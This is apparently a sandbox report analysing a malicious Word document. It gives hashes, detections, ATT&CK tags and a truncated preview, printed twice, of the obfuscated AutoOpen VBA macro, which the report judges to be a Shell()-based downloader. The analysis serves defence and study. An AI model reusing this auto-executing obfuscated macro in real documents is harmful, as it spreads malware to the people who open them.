Office (OLE) malware analysis — malicious · d772837ae2873b5e

MALICIOUS

Office (OLE)

117.0 KB Created: 2018-09-27 22:54:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: d226a2913d57813b19a03932699c973e SHA-1: 40fbd3cb74894924400f8dacdd71574158da306e SHA-256: d772837ae2873b5eb3809366707fc349283dad768f05eaec332ed2dbe7097fe5

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and uses a Shell() call, indicating it is designed to execute arbitrary code. The macro is heavily obfuscated, but its presence and the Shell() call strongly suggest it's a downloader for a second-stage payload. No specific family could be identified due to obfuscation.

Heuristics 6

ClamAV: Doc.Malware.00536d-6922936-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6922936-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19384 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19384 bytes
SHA-256: `df3a2bf0aa44a4095889fd4af6c4a16a3fa22f616164e38097843d2b3659dc78`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "naApzDZwWb" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim CUqMH(2) CUqMH(0) = InStr(DNMsj + wYFWYpYnliBOJrqID + jALCHjB, PMZVf + IRSdjFiNnoDUrhVrEL + JWlhS) + Left(BjuLhqk + bWEoTswiqUsAomKJHvX + imFJIU, 651) + Left(aPiGimR + icTmBjqujbtwDFhmoZhIO + YcOEXs, 676) + Right(jzwkKZRZ + nbLXTdFjdwTFbccqIjJ + cpJzc, 297) CUqMH(1) = InStrRev(GiXzN + bSOzQwPrIoRpjtWAvdUIB + pMWEiI, PpUKpOM + onzSYNmtMKRHKMfCUQij + TDbTj) + InStr(jfTOWCQ + KCvsPIfiuHJcGiKEJ + vZbkbqz, qDkFbkWs + TolfYDIHnsMkHVRfj + VCRFr) Dim WMRsls(2) WMRsls(0) = InStrRev(uCjVh + AdOLVTFNijITSMnZla + DjwwbO, HUzCn + zPHHDOCSZjkUhIYKLiWVnr + coThab) + InStrRev(JiTXFBzj + iddwQEddBauTQouwsGIoswZ + EKhqw, lqdYP + wiOOKCiLCijoWolcbYVUkwa + EwXin) WMRsls(1) = InStrRev(KdjPZ + jfHPEqzFhncYbKizfHiizs + iHQbC, lociVMF + pvKkkATiZnmEAIjTzNGk + pVBiOmZI) + Right(EhuZdIzw + thoULvmBFiKpszkQmOdt + pfGpo, 302) + Left(AzHhh + HnHFGuBizLMjqGdQVQYzMq + psnzP, 272) + InStrRev(aWnEJzd + dDdRujTEACipvPCIqBvwiK + AYHXmwHi, luJTtzNu + bXWRvUliFvHPqSfQliMcnG + XIvloMtS) Dim qcRKS(1) qcRKS(0) = Left(ziiTAOr + LDOuiLnOjmTHupcSAzb + vnbdf, 430) + InStrRev(BKBqD + ipvwlOsjIvLliknCzuj + smhSwtfV, nKDfd + vsUkKIffQDAjZGDzjuvq + FclYbFJ) Dim ZOuHuX(1) ZOuHuX(0) = Right(QzUffjF + ZWAliBHGLHLniRSasoKkQJ + VZqCvrqI, 866) + Right(vMmRo + YdOCNOfOuPlkcZQPJMUwa + PoOFW, 416) + Right(kbcTM + PcwtHYWBBBZEjodC + RIXtM, 673) + InStrRev(iSEmFwrA + oqRMEVWwfvopKdUYAvojZT + mzGNfHMO, EDBwplMB + uIMzWbjzJstWZrSPjcv + uRWDFDUX) Dim zaFBa(1) zaFBa(0) = Left(UKbMwqp + ltHurakkzOSRaMUbTTz + QpESTC, 664) + InStr(wdPVDjW + RbCLCkwzVNnQmZkWRuhQ + VwNtInFc, sUEnUTV + jnjrpkfzZwjKinkDbhIK + jPZOB) + Left(PDmEpE + hIFDjimkGjjSqdsnJVB + bXTGvPrj, 245) + InStr(YCHGFzdo + OGZXOaROnjsHcJqUOzWXw + WliLrM, MQuihpv + HMjvfzaVTtWsjcQsiCwUj + tjtIfT) Dim CdkJr(2) CdkJr(0) = InStrRev(qOzAKjc + ttlMAwMDEFcPwTSWjoi + FlhYz, tQpJamN + qXGmwaRIfrOGFSZHPQ + TTLMan) + InStr(GOSpQco + KQQUsnKNwHMncKmSmmA + wkAoPLji, Ezzsb + BNpGWAiNFpWamVXHW + BPdzFknf) CdkJr(1) = Left(UOlmo + jaKCFtHjtMcVTbMacWv + hniBLiYw, 648) + Left(vosvVW + rbCwrtiZOLDomTOFazVO + vfkNQE, 112) + InStrRev(zPirmI + wkWsjUXdHRWMIXwNE + KFuSo, bcwDtWdY + WQqnzVtbCWTpupaQzQUQ + iUjiz) + InStrRev(qlqoaVM + YMBTHmkGjDHCzImSUlL + ldEEiM, zYsHOO + SzcTfcIqoRiuwnNkiizFtLq + Culur) Dim LiFOi(1) LiFOi(0) = Right(chHJJtf + NUoQLGCQQcuINkZVqfGr + YbzAJD, 307) + InStrRev(QpDXME + ESEjTUYjTJDNHcnfEQANMo + tWNMRJqC, rEHYQ + GCHJMYjZcYDEsWfNLGru + DaziX) + Right(PiFmfnjz + rhRwUMzZsDZcPHlwjpCv + anFzjwPi, 356) + Left(FGjOzJ + vpBqiuiYzwplsKtYAuovKP + wYkjjPI, 561) Dim mjIoJ(2) mjIoJ(0) = Right(PqvlSC + XjjQJUtHoTwouDUuAdctYJ + PwZXGYX, 440) + Left(bQhtBA + WYVnYuwHBvmHGomiRNaRXw + DMHcbu, 673) mjIoJ(1) = Left(McafZwnV + GUcvPSibvGwouviZTsY + ZBIDrPnv, 917) + Left(vbRrJ + HrqOnAfDJwhAlVOJP + IKCJP, 680) + InStrRev(mPLjRcA + wCMMizFTupvcAtifMiuQLZ + wtQYlKA, dziLO + odiJOSLVUwjElAnHLDWEkcpj + DUwazciq) + Left(ihuiQM + acMXtsrSZzhUaqAAJE + wuzNiJ, 847) jJFKbTtoJbGsCo (KeyString(roEhdBBR + UWjsiwb + 21 + 13 + 33 + mzBrKF + sELuvSZD) + WViti + Fjttu + KeyString(infzpzu + HJNQhZEJ + 24 + 15 + 38 + vEIntVnp + mAwZhP) + MvbLMkzfUw + AmQoEVErEi + klYsUjVw + jaaroH + tPGUj) Dim okkjv(2) okkjv(0) = InStr(wSPDqcin + UTspSNWbsaUWubUujwc + iIbkQOZF, ANZbWX + iSSbvrZAKsqNBLKllKw + iGuzrz) + Right(UnunYC + tqNONUJAYQLlcwzzoari + VWHwZ, 554) + Left(frTkFHfm + TjmlrpKpFXjBIMBNMavHNG + ztpRCos, 294) + InStrRev(jiRmkBD + qLXDQCYZXbYfGLloUrJtvb + wapuEmHu, qZOdPTr + EXGbpOFHjRcEczjd + YLrjFMZ) okkjv(1) = InStr(qBEaDaq + iphzOwORKBNTPjLOr + pOfqQ, FdmAj + FYzqlqupLGnlKbHPaAS + laMMhP) + InStrRev(OmKHOXFt + ZUjcmriKsTYjmFKdiha + ZwAPA, WSZsz + nVdTEjpFXCpPaszYcCn + NGqzGG) + InStrRev(kwXIE + YajtcMlHGrjMGziKFw + jwdwEWX, idABSu + CVjqOAfXqXduqsAuzQ + jzVCQa) + Right(FQDDdzsV + RjfAdbWJJSAOFzqsXkEM + MqFutz, 594) ... (truncated)

SHA-256: df3a2bf0aa44a4095889fd4af6c4a16a3fa22f616164e38097843d2b3659dc78

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "naApzDZwWb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim CUqMH(2)
CUqMH(0) = InStr(DNMsj + wYFWYpYnliBOJrqID + jALCHjB, PMZVf + IRSdjFiNnoDUrhVrEL + JWlhS) + Left(BjuLhqk + bWEoTswiqUsAomKJHvX + imFJIU, 651) + Left(aPiGimR + icTmBjqujbtwDFhmoZhIO + YcOEXs, 676) + Right(jzwkKZRZ + nbLXTdFjdwTFbccqIjJ + cpJzc, 297)
CUqMH(1) = InStrRev(GiXzN + bSOzQwPrIoRpjtWAvdUIB + pMWEiI, PpUKpOM + onzSYNmtMKRHKMfCUQij + TDbTj) + InStr(jfTOWCQ + KCvsPIfiuHJcGiKEJ + vZbkbqz, qDkFbkWs + TolfYDIHnsMkHVRfj + VCRFr)
   Dim WMRsls(2)
WMRsls(0) = InStrRev(uCjVh + AdOLVTFNijITSMnZla + DjwwbO, HUzCn + zPHHDOCSZjkUhIYKLiWVnr + coThab) + InStrRev(JiTXFBzj + iddwQEddBauTQouwsGIoswZ + EKhqw, lqdYP + wiOOKCiLCijoWolcbYVUkwa + EwXin)
WMRsls(1) = InStrRev(KdjPZ + jfHPEqzFhncYbKizfHiizs + iHQbC, lociVMF + pvKkkATiZnmEAIjTzNGk + pVBiOmZI) + Right(EhuZdIzw + thoULvmBFiKpszkQmOdt + pfGpo, 302) + Left(AzHhh + HnHFGuBizLMjqGdQVQYzMq + psnzP, 272) + InStrRev(aWnEJzd + dDdRujTEACipvPCIqBvwiK + AYHXmwHi, luJTtzNu + bXWRvUliFvHPqSfQliMcnG + XIvloMtS)
   Dim qcRKS(1)
qcRKS(0) = Left(ziiTAOr + LDOuiLnOjmTHupcSAzb + vnbdf, 430) + InStrRev(BKBqD + ipvwlOsjIvLliknCzuj + smhSwtfV, nKDfd + vsUkKIffQDAjZGDzjuvq + FclYbFJ)
   Dim ZOuHuX(1)
ZOuHuX(0) = Right(QzUffjF + ZWAliBHGLHLniRSasoKkQJ + VZqCvrqI, 866) + Right(vMmRo + YdOCNOfOuPlkcZQPJMUwa + PoOFW, 416) + Right(kbcTM + PcwtHYWBBBZEjodC + RIXtM, 673) + InStrRev(iSEmFwrA + oqRMEVWwfvopKdUYAvojZT + mzGNfHMO, EDBwplMB + uIMzWbjzJstWZrSPjcv + uRWDFDUX)
   Dim zaFBa(1)
zaFBa(0) = Left(UKbMwqp + ltHurakkzOSRaMUbTTz + QpESTC, 664) + InStr(wdPVDjW + RbCLCkwzVNnQmZkWRuhQ + VwNtInFc, sUEnUTV + jnjrpkfzZwjKinkDbhIK + jPZOB) + Left(PDmEpE + hIFDjimkGjjSqdsnJVB + bXTGvPrj, 245) + InStr(YCHGFzdo + OGZXOaROnjsHcJqUOzWXw + WliLrM, MQuihpv + HMjvfzaVTtWsjcQsiCwUj + tjtIfT)
   Dim CdkJr(2)
CdkJr(0) = InStrRev(qOzAKjc + ttlMAwMDEFcPwTSWjoi + FlhYz, tQpJamN + qXGmwaRIfrOGFSZHPQ + TTLMan) + InStr(GOSpQco + KQQUsnKNwHMncKmSmmA + wkAoPLji, Ezzsb + BNpGWAiNFpWamVXHW + BPdzFknf)
CdkJr(1) = Left(UOlmo + jaKCFtHjtMcVTbMacWv + hniBLiYw, 648) + Left(vosvVW + rbCwrtiZOLDomTOFazVO + vfkNQE, 112) + InStrRev(zPirmI + wkWsjUXdHRWMIXwNE + KFuSo, bcwDtWdY + WQqnzVtbCWTpupaQzQUQ + iUjiz) + InStrRev(qlqoaVM + YMBTHmkGjDHCzImSUlL + ldEEiM, zYsHOO + SzcTfcIqoRiuwnNkiizFtLq + Culur)
   Dim LiFOi(1)
LiFOi(0) = Right(chHJJtf + NUoQLGCQQcuINkZVqfGr + YbzAJD, 307) + InStrRev(QpDXME + ESEjTUYjTJDNHcnfEQANMo + tWNMRJqC, rEHYQ + GCHJMYjZcYDEsWfNLGru + DaziX) + Right(PiFmfnjz + rhRwUMzZsDZcPHlwjpCv + anFzjwPi, 356) + Left(FGjOzJ + vpBqiuiYzwplsKtYAuovKP + wYkjjPI, 561)
   Dim mjIoJ(2)
mjIoJ(0) = Right(PqvlSC + XjjQJUtHoTwouDUuAdctYJ + PwZXGYX, 440) + Left(bQhtBA + WYVnYuwHBvmHGomiRNaRXw + DMHcbu, 673)
mjIoJ(1) = Left(McafZwnV + GUcvPSibvGwouviZTsY + ZBIDrPnv, 917) + Left(vbRrJ + HrqOnAfDJwhAlVOJP + IKCJP, 680) + InStrRev(mPLjRcA + wCMMizFTupvcAtifMiuQLZ + wtQYlKA, dziLO + odiJOSLVUwjElAnHLDWEkcpj + DUwazciq) + Left(ihuiQM + acMXtsrSZzhUaqAAJE + wuzNiJ, 847)
jJFKbTtoJbGsCo (KeyString(roEhdBBR + UWjsiwb + 21 + 13 + 33 + mzBrKF + sELuvSZD) + WViti + Fjttu + KeyString(infzpzu + HJNQhZEJ + 24 + 15 + 38 + vEIntVnp + mAwZhP) + MvbLMkzfUw + AmQoEVErEi + klYsUjVw + jaaroH + tPGUj)
   Dim okkjv(2)
okkjv(0) = InStr(wSPDqcin + UTspSNWbsaUWubUujwc + iIbkQOZF, ANZbWX + iSSbvrZAKsqNBLKllKw + iGuzrz) + Right(UnunYC + tqNONUJAYQLlcwzzoari + VWHwZ, 554) + Left(frTkFHfm + TjmlrpKpFXjBIMBNMavHNG + ztpRCos, 294) + InStrRev(jiRmkBD + qLXDQCYZXbYfGLloUrJtvb + wapuEmHu, qZOdPTr + EXGbpOFHjRcEczjd + YLrjFMZ)
okkjv(1) = InStr(qBEaDaq + iphzOwORKBNTPjLOr + pOfqQ, FdmAj + FYzqlqupLGnlKbHPaAS + laMMhP) + InStrRev(OmKHOXFt + ZUjcmriKsTYjmFKdiha + ZwAPA, WSZsz + nVdTEjpFXCpPaszYcCn + NGqzGG) + InStrRev(kwXIE + YajtcMlHGrjMGziKFw + jwdwEWX, idABSu + CVjqOAfXqXduqsAuzQ + jzVCQa) + Right(FQDDdzsV + RjfAdbWJJSAOFzqsXkEM + MqFutz, 594)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.